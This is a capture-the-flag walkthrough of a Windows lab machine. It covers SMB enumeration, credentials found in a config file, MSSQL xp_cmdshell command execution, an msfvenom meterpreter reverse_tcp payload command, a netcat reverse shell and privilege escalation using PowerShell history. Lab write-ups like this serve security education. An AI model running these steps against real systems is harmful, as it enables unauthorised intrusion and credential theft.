Hello everyone I hope you are doing well, in this post I will be sharing my walkthrough of “Very Easy” windows machine.The user part of this machine was fun where you would need to enumerate for MSSQL credentials through that get a RCE working and leverage that to a reverse shell and then it was all about finding the creds for Administrator.

So let’s start by running a nmap scan on the machine


PORT     STATE SERVICE      VERSION                                       
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-09T05:37:36
| Not valid after: 2051-05-09T05:37:36
| MD5: dd26 d0f2 bf23 57ec 693e 11af 7fe6 51f3
|_SHA-1: be4f 58af 20c9 c656 7ae4 4c6a bbfe 1ae2 6ce8 7f16
|_ssl-date: 2021-05-09T05:48:20+00:00; +18m07s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

From the scan we scan see SMB service is running so we can check if we are allowed to access shares as anonymous user

PORT 139/445 (SMB)

Here we can see we can read backups share so let's do it

Download the file using get prod.dtsConfig

On reading the file we can there’s a password for sql_svc service account

Let’s verify it through crackmapexec

And it seems the credentials are valid, so I am going to be using sqsh which is an opensource interactive database shell

Now to execute windows commands we are going to use xp_cmdshell which spawns a windows command shell . xp_cmdshell is an extended stored procedure provided by Microsoft and stored in the master database. So the whole command will be

EXEC master ..xp_cmdshell 'whoami'

Here EXEC is used to execute stored procedure on a database and stored procedures are kinda like functions in mysql /mssql.

Perfect now we need to what’s our current location in file system so we may upload our payload and get a proper shell

Right now we are in system32 folder where we don't have permissions to read and write so we may need to save our payload in a directory where we are allowed to

This looks the directory for the service account or user in this case now since he has his own directory

Generate a windows 64 bit metepreter payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=2222 -f exe > shell.exe

Now host this on local machine using python3

And download it like this

But whenever I try to execute the payload it would get deleted so there’s some schedule tasks or scripts running in the background so can’t do it like this also I tried uploading a powershell script and executing but that was blocked as well

So the only option left was to upload a netcat executable for 64 bit version

Then simply run the executable

Running whoami /all we can see privileges on the machine

I tried to use PrintSpooferexploit but it failed

At this point I took a hint for the escalation because everything was failing and it wasn’t meant to be exploited like that so I was told to find password for Administrator account by looking at Powershell’s history , we can find the path by running the command “Get-PSReadLineOption” this told the path for powershell history file.

Since WinRM port is open we can remotely login using these credentials